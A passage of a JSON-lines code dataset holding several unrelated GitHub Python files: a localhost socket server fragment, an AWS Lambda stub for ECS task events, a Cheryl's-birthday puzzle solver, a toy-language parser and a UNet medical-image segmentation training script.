      \\r\\n\")\r\n #Close client socket\r\n connectionSocket.close()\r\n return\r\n\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\n#Prepare a sever socket\r\nHOST = 'localhost'\r\nPORT = 8888\r\ntry:\r\n serverSocket.bind((HOST, PORT))\r\nexcept:\r\n sys.exit\r\n\r\nserverSocket.listen(10)\r\n\r\n\r\n\r\n\r\n \r\nwhile True:\r\n #Establish the connection\r\n print ('Ready to serve...')\r\n connectionSocket, addr = serverSocket.accept()\r\n threads = []\r\n t = threading.Thread(target=server, args=(connectionSocket,))\r\n threads.append(t)\r\n t.start()\r\n \r\nserverSocket.close()\r\n \r\n","repo_name":"djford/College-Projects","sub_path":"Client + Server/server2.py","file_name":"server2.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26489031484","text":"\"\"\"\nThis is a Lambda function to be triggered from CloudWatch Events (ECS Task Stopped).\n\"\"\"\nimport boto3\nimport json\nimport logging\n\n\n# Update the root logger to get messages at DEBUG and above\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.getLogger(\"botocore\").setLevel(logging.CRITICAL)\nlogging.getLogger(\"boto3\").setLevel(logging.CRITICAL)\nlogging.getLogger(\"urllib3.connectionpool\").setLevel(logging.CRITICAL)\n\nlogging.info(f\"boto3.__version__: {boto3.__version__}\")\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Main entry point when triggering the AWS Lambda function.\n\n :param event: a dictionary of event information from AWS ECS Task Stopped event\n :param context: a dictionary of runtime information from AWS ECS\n\n Example of `event`: (taskArn is the task_id in DynamoDB)\n \"version\": \"0\",\n \"id\": \"xxxx\",\n \"detail-type\": \"ECS Task State Change\",\n \"source\": \"aws.ecs\",\n \"account\": \"111122223333\",\n \"time\": \"2019-06-30T03:36:57Z\",\n \"region\": \"ap-southeast-2\",\n \"resources\": [\n \"arn:aws:ecs:ap-southeast-2:111122223333:task/xxxx\"\n ],\n \"detail\": {\n \"clusterArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:cluster/Orca-Cluster\",\n \"containerInstanceArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:container-instance/xxxx\",\n \"containers\": [\n {\n \"containerArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:container/xxxx\",\n \"exitCode\": 1,\n \"lastStatus\": \"STOPPED\",\n \"name\": \"sample_app-1_0_0\",\n \"taskArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:task/xxxx\",\n \"networkInterfaces\": [],\n \"cpu\": \"4\",\n \"memory\": \"1024\"\n }\n ],\n \"createdAt\": \"2019-06-30T03:36:53.763Z\",\n \"launchType\": \"EC2\",\n \"cpu\": \"4\",\n \"memory\": \"1024\",\n \"desiredStatus\": \"STOPPED\",\n \"group\": \"family:sample_app-1_0_0\",\n \"lastStatus\": \"STOPPED\",\n \"overrides\": {\n \"containerOverrides\": [\n {\n \"environment\": [\n {\n \"name\": \"S3_BUCKET\",\n \"value\": \"bucket-name-xxx\"\n }\n ],\n \"name\": \"sample_app-1_0_0\"\n }\n ]\n },\n \"attachments\": [],\n \"connectivity\": \"CONNECTED\",\n \"connectivityAt\": \"2019-06-30T03:36:53.763Z\",\n \"pullStartedAt\": \"2019-06-30T03:36:55.311Z\",\n \"startedAt\": \"2019-06-30T03:36:56.311Z\",\n \"stoppingAt\": \"2019-06-30T03:36:57.935Z\",\n \"stoppedAt\": \"2019-06-30T03:36:57.935Z\",\n \"pullStoppedAt\": \"2019-06-30T03:36:55.311Z\",\n \"executionStoppedAt\": \"2019-06-30T03:36:57Z\",\n \"stoppedReason\": \"Essential container in task exited\",\n \"stopCode\": \"EssentialContainerExited\",\n \"updatedAt\": \"2019-06-30T03:36:57.935Z\",\n \"taskArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:task/xxxx\",\n \"taskDefinitionArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:task-definition/sample_app-1_0_0:1\",\n \"version\": 3\n }\n }\n \"\"\"\n logging.debug(\"Received event: \" + json.dumps(event))\n\n if event[\"source\"] != \"aws.ecs\":\n raise ValueError(\"Function only supports input from events with a source type of: aws.ecs\")\n\n # Extract data from event\n params = {\n \"timestamp\": event[\"detail\"][\"stoppedAt\"],\n \"task_arn\": event[\"detail\"][\"taskArn\"],\n \"other_env_data\": event[\"detail\"][\"overrides\"][\"containerOverrides\"][0][\"environment\"],\n }\n return process_ecs_task_stopped_event(params)\n\n\ndef process_ecs_task_stopped_event(params):\n # TODO\n return 0\n","repo_name":"kyhau/aws-tools","sub_path":"ECS/ecs-taskstopped-handling/lambda/TaskStoppedHandler.py","file_name":"TaskStoppedHandler.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"67"} +{"seq_id":"29850807880","text":"'''\nCreated on May 14, 2015\n\n@author: finn\n\nAlbert and Bernard just became friends with Cheryl, and they want to know when her birtxhday is. \nCheryl gave them a list of 10 possible dates:\n\n May 15 May 16 May 19\n June 17 June 18\n July 14 July 16\n August 14 August 15 August 17\n\nCheryl then tells Albert and Bernard separately the month and the day of the birthday respectively.\n\n1) Albert: I don't know when Cheryl's birthday is, but I know that Bernard does not know too.\n\n2) Bernard: At first I don't know when Cheryl's birthday is, but I know now.\n\n3) Albert: Then I also know when Cheryl's birthday is.\n\n4) So when is Cheryl's birthday?\n'''\n\n\nif __name__ == '__main__':\n candidates = [(\"May\", 15), (\"May\", 16), (\"May\", 19),\n (\"June\", 17), (\"June\", 18),\n (\"July\", 14), (\"July\", 16),\n (\"August\", 14), (\"August\", 15), (\"August\", 17)]\n months = [md[0] for md in candidates] # set(md[0] for md in candidates)\n days = [md[1] for md in candidates] # set(md[1] for md in candidates)\n\n a1 = [md for md in candidates if md[1] in [d for d in days if days.count(d) > 1]]\n a1_excludes = [md for md in candidates if md not in a1]\n b1 = [md for md in a1 if md[0] not in [m[0] for m in a1_excludes] \n and md[1] in [mdd[1] for mdd in candidates if mdd[0] in [mm[0] for mm in a1_excludes]]]\n a2 = [md for md in b1 if [m[0] for m in b1].count(md[0]) == 1]\n \n print(\"a1\", a1)\n print(\"a1_excludes\", a1_excludes)\n print(\"b1\", b1)\n print(\"a2\", a2)\n \n ","repo_name":"finnrj/python-proj","sub_path":"py-euler/cheryls_birthday.py","file_name":"cheryls_birthday.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"28691886008","text":"import importlib\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Callable, Collection, List\n\nfrom src.ast import (\n AssStmt,\n Assign,\n BlockStmt,\n BreakStmt,\n CallExpr,\n ClassDecl,\n ContinueStmt,\n Expr,\n ExprStmt,\n FunctionDecl,\n GroupingExpr,\n IfStmt,\n ImportStmt,\n Literal,\n ObjRef,\n PropertyAccess,\n ReturnStmt,\n SetProperty,\n Stmt,\n Stmts,\n SuperRef,\n UnaryExpr,\n VarAccess,\n WhileStmt,\n)\nfrom src.error_handler import ErrorHandler\nfrom src.Lexer import Token, TokenType\nfrom src.errors import UnexpectedTokenException\n\n\nclass Parser(ABC):\n def __init__(self, tokens: List[Token]) -> None:\n self.tokens = tokens\n self.index = 0\n self.lookahead = self.tokens[self.index]\n\n @abstractmethod\n def _parse_error(self, message: str, throw: bool = True) -> None:\n pass\n\n def is_eof(self) -> bool:\n return self.lookahead.type == TokenType.EOF\n\n def advance(self) -> Token:\n if self.is_eof():\n return self.tokens[-1]\n token = self.lookahead\n self.consume()\n return token\n\n def consume(self) -> None:\n self.index += 1\n if not self.is_eof():\n self.lookahead = self.tokens[self.index]\n\n def is_type_in(self, *token_types) -> bool:\n return self.lookahead.type in token_types\n\n def match(self, expected_type: TokenType, message: str) -> None:\n \"\"\"match() is a support method in the Parser that consumes a token T if T is the current\n lookahead token. If there is a mismatch, match() throws an exception.\"\"\"\n if self.is_type_in(expected_type):\n self.consume()\n else:\n self._parse_error(message)\n\n @abstractmethod\n def parse(self):\n pass\n\n\ndef binary_node(name: str, *token_types: Collection[TokenType]):\n module = importlib.import_module(\"src.ast\")\n\n def binary_node_creator(f: Callable):\n def binary_wrapper(parser: Parser):\n left = f(parser)\n while parser.is_type_in(*token_types):\n operator = parser.advance()\n left = getattr(module, name)(left, operator, f(parser))\n return left\n\n return binary_wrapper\n\n return binary_node_creator\n\n\nclass RecursiveDescentParser(Parser):\n def __init__(self, tokens: List[Token], error_handler: ErrorHandler) -> None:\n super().__init__(tokens)\n self.error_handler = error_handler\n self.loop_count = 0\n\n def _parse_error(self, message: str, throw: bool = True) -> None:\n message = f\"Line[{self.lookahead.line}]: at {self.lookahead} \" + message\n self.error_handler.error(message)\n if throw:\n raise UnexpectedTokenException()\n\n # TODO: Add support for error recovery\n def _synchronize(self) -> None:\n \"\"\"Synchronize at statement boundaries which in my case are newlines.\n Keywords starting off statements are also synchronization words.\"\"\"\n sync_token = self.advance() # toss mismatched token\n while not self.is_eof():\n if sync_token.type == TokenType.NEWLINE:\n return\n elif self.is_type_in(\n TokenType.IMPORT,\n TokenType.DEF,\n TokenType.WHILE,\n TokenType.IF,\n TokenType.NEWVAR,\n TokenType.CONTINUE,\n TokenType.BREAK,\n TokenType.RETURN,\n ):\n return\n sync_token = self.advance()\n\n def parse(self) -> Any:\n stmts = []\n while self.is_type_in(TokenType.IMPORT, TokenType.COLON):\n stmts.append(self._import())\n while not self.is_eof():\n stmts.append(self._declaration())\n return Stmts(stmts)\n\n def _import(self) -> ImportStmt:\n try:\n import_tok = self.advance()\n name = self._qualified_name()\n imported_elements = None\n if import_tok.type == TokenType.COLON:\n self.match(\n TokenType.IMPORT,\n \"Expect 'gaijin' in import statement starting with ':'.\",\n )\n imported_elements = self._imported_elements()\n self.match(TokenType.NEWLINE, \"Expect newline after import statement.\")\n return ImportStmt(import_tok, name, imported_elements)\n except UnexpectedTokenException:\n self._synchronize()\n\n def _qualified_name(self) -> str:\n name = \"\"\n while self.is_type_in(TokenType.DOT):\n self.advance()\n name += \".\"\n\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'gaijin'.\")\n name += self.advance().value\n while self.is_type_in(TokenType.DOT):\n self.advance()\n name += \".\"\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after '.' in module name.\")\n name += self.advance().value\n\n return name\n\n def _imported_elements(self) -> List[Token]:\n imports = []\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'gaijin'.\")\n imports.append(self.advance())\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n if self.is_type_in(TokenType.IDENTIFIER):\n imports.append(self.advance())\n else:\n self._parse_error(\n \"Expect identifier after ',' in import declaration list.\"\n )\n return imports\n\n def _declaration(self) -> Stmt:\n try:\n if self.is_type_in(TokenType.DECORATOR):\n return self._decorator()\n if self.is_type_in(TokenType.DEF):\n return self._function_decl()\n if self.is_type_in(TokenType.CLASS):\n return self._class_decl()\n return self._statement()\n except UnexpectedTokenException as ue:\n self._synchronize()\n\n def _class_decl(self) -> Stmt:\n self.advance() # consume waifu token\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'waifu'.\")\n name = self.advance()\n\n supercls = None\n if self.is_type_in(TokenType.EXTENDS):\n supercls = self._parse_superclasses()\n\n self.match(TokenType.COLON, \"Expect colon after waifu declaration.\")\n self.match(TokenType.NEWLINE, \"Expect Newline character after ':'.\")\n self.match(TokenType.INDENT, \"Expect indent after block creation.\")\n\n methods = []\n while self.is_type_in(TokenType.DEF, TokenType.STATIC):\n methods.append(self._function_decl(self.is_type_in(TokenType.STATIC)))\n self.match(TokenType.DEDENT, \"Expect dedent after leaving the class body.\")\n return ClassDecl(name, supercls, methods)\n\n def _parse_superclasses(self) -> List[VarAccess]:\n self.advance() # consume neesan token\n supercls = []\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'neesan'.\")\n supercls.append(VarAccess(self.advance()))\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n if self.is_type_in(TokenType.IDENTIFIER):\n supercls.append(VarAccess(self.advance()))\n else:\n self._parse_error(\"Expect identifier after ',' in neesan clause.\")\n return supercls\n\n def _function_decl(self, static: bool = False) -> Stmt:\n self.advance() # consume desu/oppai token\n return self._function(static)\n\n def _function(self, static: bool = False) -> FunctionDecl:\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'desu'.\")\n name = self.advance()\n self.match(TokenType.OP_PAR, \"Expect '(' after function name.\")\n params = self._formal_params()\n self.match(TokenType.CL_PAR, \"Expect ')' after function parameters.\")\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\n \"Expect ':' for block creation after function parameters.\"\n )\n body = self._block_stmt()\n return FunctionDecl(None, name, params, body, static)\n\n def _formal_params(self) -> List[Token]:\n params = []\n if not self.is_type_in(TokenType.CL_PAR):\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier in function parameters.\")\n params.append(self.advance())\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n if len(params) > 127:\n self._parse_error(\"Maximum number of parameters is 127.\", False)\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier in function parameters.\")\n params.append(self.advance())\n\n return params\n\n def _decorator(self) -> FunctionDecl:\n self.advance() # eat @\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after '@' in decorated function.\")\n name = self.advance()\n self.match(TokenType.NEWLINE, \"Expect newline after decorator.\")\n func = self._function_decl()\n func.decorator = VarAccess(name)\n return func\n\n def _statement(self) -> Stmt:\n if self.is_type_in(TokenType.IF):\n return self._if_stmt()\n if self.is_type_in(TokenType.WHILE):\n return self._while_stmt()\n if self.is_type_in(TokenType.BREAK):\n return self._break_stmt()\n if self.is_type_in(TokenType.CONTINUE):\n return self._continue_stmt()\n if self.is_type_in(TokenType.RETURN):\n return self._return_stmt()\n if self.is_type_in(TokenType.NEWVAR):\n return self._new_var()\n\n # All valid assignment targets are expressions -> parsing\n # expressions parses assignment targets\n expr = self._expression()\n if self.is_type_in(TokenType.ASSIGNMENT):\n return self._assign_stmt(expr)\n return self._expression_stmt(expr)\n\n def _break_stmt(self) -> BreakStmt:\n if self.loop_count <= 0:\n self._parse_error(\"Can only use yamero in a loop body.\", False)\n self.advance()\n self.match(TokenType.NEWLINE, \"Expect newline character after yamero.\")\n return BreakStmt()\n\n def _continue_stmt(self) -> ContinueStmt:\n if self.loop_count <= 0:\n self._parse_error(\"Can only use kowai in a loop body.\", False)\n self.advance()\n self.match(TokenType.NEWLINE, \"Expect newline character after kowai.\")\n return ContinueStmt()\n\n def _return_stmt(self) -> ReturnStmt:\n err = self.advance() # consume return\n expr = None\n if not self.is_type_in(TokenType.NEWLINE):\n expr = self._expression()\n self.match(TokenType.NEWLINE, \"Expect newline character after return.\")\n return ReturnStmt(err, expr)\n\n def _while_stmt(self) -> WhileStmt:\n try:\n self.loop_count += 1\n self.advance() # eat while token\n condition = self._expression()\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\"Expect ':' for block creation after while.\")\n block = BlockStmt(self._block_stmt())\n return WhileStmt(condition, block)\n finally:\n self.loop_count -= 1\n\n def _if_stmt(self) -> IfStmt:\n self.advance() # eat if token\n condition = self._expression()\n # TODO: Prolly cleaner to match before trying to parse a block\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\"Expect ':' for block creation after if.\")\n block = BlockStmt(self._block_stmt())\n\n alternative = None\n if self.is_type_in(TokenType.ELSE):\n self.advance()\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\"Expect ':' for block creation after else.\")\n alternative = BlockStmt(self._block_stmt())\n\n return IfStmt(condition, block, alternative)\n\n def _block_stmt(self) -> List[Stmt]:\n stmts = []\n self.advance() # Eat the colon\n self.match(TokenType.NEWLINE, \"Expect newline character after colon.\")\n self.match(TokenType.INDENT, \"Expect indent after block creation.\")\n while not self.is_type_in(TokenType.DEDENT, TokenType.EOF):\n stmts.append(self._declaration())\n\n self.match(TokenType.DEDENT, \"Expect dedent after block end.\")\n if not stmts:\n self._parse_error(\"Block may not be empty.\", False)\n return stmts\n\n def _expression_stmt(self, expr: Expr) -> ExprStmt:\n message = \"Expect newline character after statement.\"\n self.match(TokenType.NEWLINE, message)\n return ExprStmt(expr)\n\n def _assign_stmt(self, expr: Expr, new_var: bool = False) -> Stmt:\n \"\"\"Wraps a sequence of assignment expressions in a statement form. If called\n from the new_var method, assignments correspond to variable definitions.\n Feels somewhat weird to separate assignments like this.\"\"\"\n self.advance()\n if type(expr) is VarAccess:\n ass_stmt = AssStmt(new_var, expr.name, self._assign(new_var))\n message = \"Expect newline character after assignment.\"\n self.match(TokenType.NEWLINE, message)\n return ass_stmt\n elif type(expr) is PropertyAccess:\n if new_var:\n self._parse_error(\"Can't use 'baka' when setting properties.\", False)\n setter = SetProperty(expr.obj, expr.name, self._assign(new_var))\n message = \"Expect newline character after setting a property.\"\n self.match(TokenType.NEWLINE, message)\n return setter\n else:\n self._parse_error(\"Can't assign to this left hand side.\", False)\n\n def _assign(self, new_var: bool = False) -> Expr:\n \"\"\"Expression part of an assignment. Basically the same code as in _assign_stmt.\"\"\"\n expr = self._expression()\n if self.is_type_in(TokenType.ASSIGNMENT):\n self.advance()\n if type(expr) is VarAccess:\n return Assign(new_var, expr.name, self._assign(new_var))\n elif type(expr) is PropertyAccess:\n return SetProperty(expr.obj, expr.name, self._assign(new_var))\n else:\n self._parse_error(\"Can't assign to this left hand side.\", False)\n self._assign(new_var) # Recover from error and continue parsing\n return expr\n\n def _new_var(self) -> AssStmt:\n \"\"\"Called when baka is read, then an assignment needs to communicate\n the runtime to create a new variable in the current scope.\"\"\"\n self.advance()\n expr = self._expression()\n if not self.is_type_in(TokenType.ASSIGNMENT):\n self._parse_error(\"Can only use 'baka' in assignments.\")\n return self._assign_stmt(expr, True)\n\n def _expression(self) -> Expr:\n return self._lambda()\n\n def _lambda(self) -> Expr:\n \"\"\"Instead of using a new node for lambda expressions, lambdas are desugared to function\n declarations, where the name of the function will be the empty string.\"\"\"\n if self.is_type_in(TokenType.QUESTION):\n token = self.advance()\n params = (\n self._formal_params() if self.is_type_in(TokenType.IDENTIFIER) else []\n )\n self.match(TokenType.COLON, \"Expect ':' after lambda expression.\")\n expr = FunctionDecl(\n None,\n Token(\"\", token.line, TokenType.IDENTIFIER),\n params,\n [ReturnStmt(token, self._lambda())],\n )\n else:\n expr = self._logic_or()\n return expr\n\n @binary_node(\"LogicalExpr\", TokenType.OR)\n def _logic_or(self) -> Expr:\n return self._logic_and()\n\n @binary_node(\"LogicalExpr\", TokenType.AND)\n def _logic_and(self) -> Expr:\n return self._equality()\n\n @binary_node(\"BinaryExpr\", TokenType.UNEQUAL, TokenType.EQUAL)\n def _equality(self) -> Expr:\n return self._comparison()\n\n @binary_node(\n \"BinaryExpr\",\n TokenType.LESS,\n TokenType.LESS_EQ,\n TokenType.GREATER,\n TokenType.GREATER_EQ,\n )\n def _comparison(self) -> Expr:\n return self._term()\n\n @binary_node(\"BinaryExpr\", TokenType.PLUS, TokenType.MINUS)\n def _term(self) -> Expr:\n return self._factor()\n\n @binary_node(\"BinaryExpr\", TokenType.TIMES, TokenType.DIVIDE)\n def _factor(self) -> Expr:\n return self._unary()\n\n def _unary(self) -> Expr:\n if self.is_type_in(TokenType.NOT, TokenType.MINUS):\n operator = self.advance()\n return UnaryExpr(operator, self._unary())\n return self._call()\n\n def _call(self) -> Expr:\n expr = self._primary()\n while self.is_type_in(TokenType.OP_PAR, TokenType.DOT):\n if self.is_type_in(TokenType.OP_PAR):\n expr = self._handle_call(expr)\n else:\n expr = self._handle_property_acc(expr)\n return expr\n\n def _handle_call(self, expr: Expr) -> CallExpr:\n self.advance() # consume (\n args = self._actual_params()\n # The token does not really matter, it's only for error messages anyways\n expr = CallExpr(expr, self.lookahead, args)\n self.match(TokenType.CL_PAR, \"Expected ')' after function call.\")\n return expr\n\n def _handle_property_acc(self, expr: Expr) -> PropertyAccess:\n self.advance() # consume dot\n name = self.lookahead\n self.match(TokenType.IDENTIFIER, \"Expect identifier after '.'.\")\n return PropertyAccess(expr, name)\n\n def _actual_params(self) -> List[Expr]:\n args = []\n if not self.is_type_in(TokenType.CL_PAR):\n args.append(self._expression())\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n args.append(self._expression())\n\n if len(args) > 127:\n self._parse_error(\"Max number of arguments is 127.\", False)\n return args\n\n def _primary(self) -> Expr:\n if self.is_type_in(TokenType.NUMBER, TokenType.STRING):\n return Literal(self.advance().value)\n if self.is_type_in(TokenType.NIL):\n self.consume()\n return Literal(None)\n if self.is_type_in(TokenType.TRUE):\n self.consume()\n return Literal(True)\n if self.is_type_in(TokenType.FALSE):\n self.consume()\n return Literal(False)\n if self.is_type_in(TokenType.OP_PAR):\n self.consume()\n expr = self._expression()\n self.match(\n TokenType.CL_PAR, \"Unclosed '('. Expected ')' after the expression.\"\n )\n return GroupingExpr(expr)\n if self.is_type_in(TokenType.IDENTIFIER):\n return VarAccess(self.advance())\n if self.is_type_in(TokenType.THIS):\n return ObjRef(self.advance())\n if self.is_type_in(TokenType.SUPER):\n sup = self.advance()\n self.match(TokenType.DOT, \"Expect '.' after 'haha'.\")\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'haha.'.\")\n return SuperRef(sup, self.advance())\n\n self._parse_error(\"Token can't be used in an expression.\")\n","repo_name":"JosWrf/waifu_pl","sub_path":"src/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":19825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28238935813","text":"from config import cfg\nimport torch\nfrom dataset.dataset import CTDataset\nfrom dataset.uwmgi import UWMGIDataset\nfrom dataset.nia import NIADataset\nfrom torch.utils.data import DataLoader\nimport segmentation_models_pytorch as smp\nfrom models.unet import UNet\nfrom tqdm import tqdm\nimport torch.optim as optim\nimport os.path as osp\nimport argparse\nfrom config import update_config\nimport wandb\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom eval import iou_coef\nfrom collections import defaultdict\nimport numpy as np\nfrom common.utils.torch_utils import *\n\n\ndef make_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--checkpoint', required=False, help='Path to pretrained checkpoint')\n parser.add_argument('--dataset', required=True, help='Dataset name', choices=['uwmgi', 'nia'])\n parser.add_argument('--cfg',\n help='experiment configure file name',\n required=True,\n type=str)\n parser.add_argument('--data_tag',\n help='data tag (AXL, COR, SAG)',\n required=True)\n parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')\n parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')\n parser.add_argument('--use_wandb',\n help='use wandb',\n action='store_true')\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = make_args()\n update_config(args.cfg)\n\n use_wandb = args.use_wandb\n tag = args.data_tag\n\n if use_wandb:\n wandb.init(project=f'{cfg.hyp.PROJECT_NAME}-{tag}',\n name=f'{cfg.hyp.OPTIMIZER.TYPE}_lr{cfg.hyp.OPTIMIZER.LR}{args.dataset}')\n wandb.config.update({\n 'batch_size': cfg.batch_size,\n 'num_workers': cfg.num_thread,\n 'optimizer': cfg.hyp.OPTIMIZER.TYPE,\n 'learning_rate': cfg.hyp.OPTIMIZER.LR,\n 'weight_decay': cfg.hyp.OPTIMIZER.WD,\n 'dataset': args.dataset\n })\n # ********************\n # 0. Setting device\n # ********************\n device = select_device(args.device, batch_size=cfg.batch_size)\n world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1\n global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1\n cuda = device.type != 'cpu'\n if args.local_rank != -1:\n assert torch.cuda.device_count() > args.local_rank\n torch.cuda.set_device(args.local_rank)\n device = torch.device('cuda', args.local_rank)\n dist.init_process_group(backend='nccl', init_method='env://') # distributed backend\n assert cfg.batch_size % world_size == 0, '--batch-size must be multiple of CUDA device count'\n\n # ********************\n # 1. Load datasets\n # ********************\n if args.dataset == 'uwgi':\n train_dataset = UWMGIDataset()\n val_dataset = UWMGIDataset()\n elif args.dataset == 'nia':\n train_dataset = NIADataset(data_split='train', tag=tag)\n val_dataset = NIADataset(data_split='val', tag=tag)\n else:\n raise ValueError(f'Dataset name {args.dataset} is not supported yet.')\n\n train_loader = CTDataset(train_dataset, transforms=cfg.data_transforms['train'])\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_loader) if args.local_rank != -1 else None\n train_generator = DataLoader(dataset=train_loader,\n batch_size=int(cfg.batch_size / world_size),\n num_workers=int(cfg.num_thread / world_size),\n pin_memory=True,\n sampler=train_sampler\n )\n\n val_loader = CTDataset(val_dataset, transforms=cfg.data_transforms['train'])\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_loader) if args.local_rank != -1 else None\n val_generator = DataLoader(dataset=val_loader,\n batch_size=int(cfg.batch_size / world_size),\n num_workers=int(cfg.num_thread / world_size),\n pin_memory=True,\n sampler=val_sampler\n )\n # ****************\n # 2. Setting Loss function\n # ****************\n BCELoss = smp.losses.SoftBCEWithLogitsLoss()\n TverskyLoss = smp.losses.TverskyLoss(mode='multilabel', log_loss=False)\n\n # ****************\n # 3. Training\n # ****************\n # load model\n model = UNet(in_channels=3, n_classes=len(train_dataset.cat_name), n_channels=48).to(device)\n if args.checkpoint is not None:\n model.load_state_dict(torch.load(args.checkpoint))\n\n # DP mode\n if cuda and global_rank == -1 and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n # DDP mode\n if cuda and global_rank != -1:\n model = DDP(model, device_ids=[args.local_rank], output_device=args.local_rank)\n\n optimizer = optim.Adam(model.parameters(),\n lr=float(cfg.hyp.OPTIMIZER.LR),\n weight_decay=float(cfg.hyp.OPTIMIZER.WD))\n\n for epoch in range(int(cfg.hyp.TRAINING.EPOCHS)):\n pbar = tqdm(enumerate(train_generator), total=len(train_generator), desc=f'Train - epoch: {epoch}')\n tracking_loss = {\n 'Loss': torch.tensor(0.).float(),\n 'BCELoss': torch.tensor(0.).float(),\n 'TverskyLoss': torch.tensor(0.).float(),\n\n 'ValLoss': torch.tensor(0.).float(),\n 'ValBCELoss': torch.tensor(0.).float(),\n 'ValTverskyLoss': torch.tensor(0.).float()\n }\n avg_loss = 0.0\n val_avg_loss = 0.0\n score = defaultdict(list)\n\n for step, (images, masks, _) in pbar:\n B = images.shape[0]\n images = images.to(device, dtype=torch.float)\n masks = masks.to(device, dtype=torch.float)\n\n y_pred = model(images)\n bce_loss = BCELoss(y_pred, masks)\n tversky_loss = TverskyLoss(y_pred, masks)\n losses = 0.5 * bce_loss + 0.5 * tversky_loss\n\n # Gradient update\n optimizer.zero_grad()\n losses.backward()\n optimizer.step()\n\n # tracking loss\n tracking_loss['Loss'] += losses.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['BCELoss'] += bce_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['TverskyLoss'] += tversky_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n\n _losses = float(losses.detach().cpu().numpy())\n pbar.set_description(\n f'Epoch {epoch + 1}/{cfg.hyp.TRAINING.EPOCHS} Train Loss - {format(_losses, \".04f\")}')\n\n avg_loss += _losses\n\n pbar.set_description(f'Epoch {epoch+1}/{cfg.hyp.TRAINING.EPOCHS} Train Loss - {format(avg_loss/B, \".04f\")}')\n\n # validation\n vpbar = tqdm(enumerate(val_generator), total=len(val_generator), desc=f'Val - epoch: {epoch}')\n for step, (images, masks, _) in vpbar:\n B = images.shape[0]\n images = images.to(device, dtype=torch.float)\n masks = masks.to(device, dtype=torch.float)\n with torch.no_grad():\n y_pred = model(images)\n val_bce_loss = BCELoss(y_pred, masks)\n val_tversky_loss = TverskyLoss(y_pred, masks)\n val_losses = 0.5 * val_bce_loss + 0.5 * val_tversky_loss\n\n # tracking loss\n tracking_loss['ValLoss'] += val_losses.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['ValBCELoss'] += val_bce_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['ValTverskyLoss'] += val_tversky_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n\n # calculate iou\n for iou_thrs in [.50, .95]:\n iou = iou_coef(masks, y_pred)\n iou_score = (iou > iou_thrs).to(torch.float32).mean(dim=(1,0)).cpu().detach().numpy()\n score[f'mAP@{format(iou_thrs,\".2f\")}'].append(float(iou_score))\n\n score_str = ''\n for k, v in score.items():\n score_str += f'{k}:{format(np.mean(v),\".2f\")} '\n vpbar.set_description(f'Validation IoU - {score_str}')\n\n if use_wandb:\n wandb.log(tracking_loss)\n\n # model save\n if (epoch+1) % 10 == 0:\n file_path = osp.join(cfg.model_dir, f'snapshot_{tag}_{epoch}.pt')\n torch.save(model.state_dict(), file_path)\n\n # model save\n file_path = osp.join(cfg.model_dir, f'snapshot_{cfg.hyp.TRAINING.EPOCHS}.pt')\n torch.save(model.state_dict(), file_path)\n print('End training')\n","repo_name":"kwonhyeokmin/Unet-seg","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3579197404","text":"#!/usr/bin/env python\n###############################################################################\n# 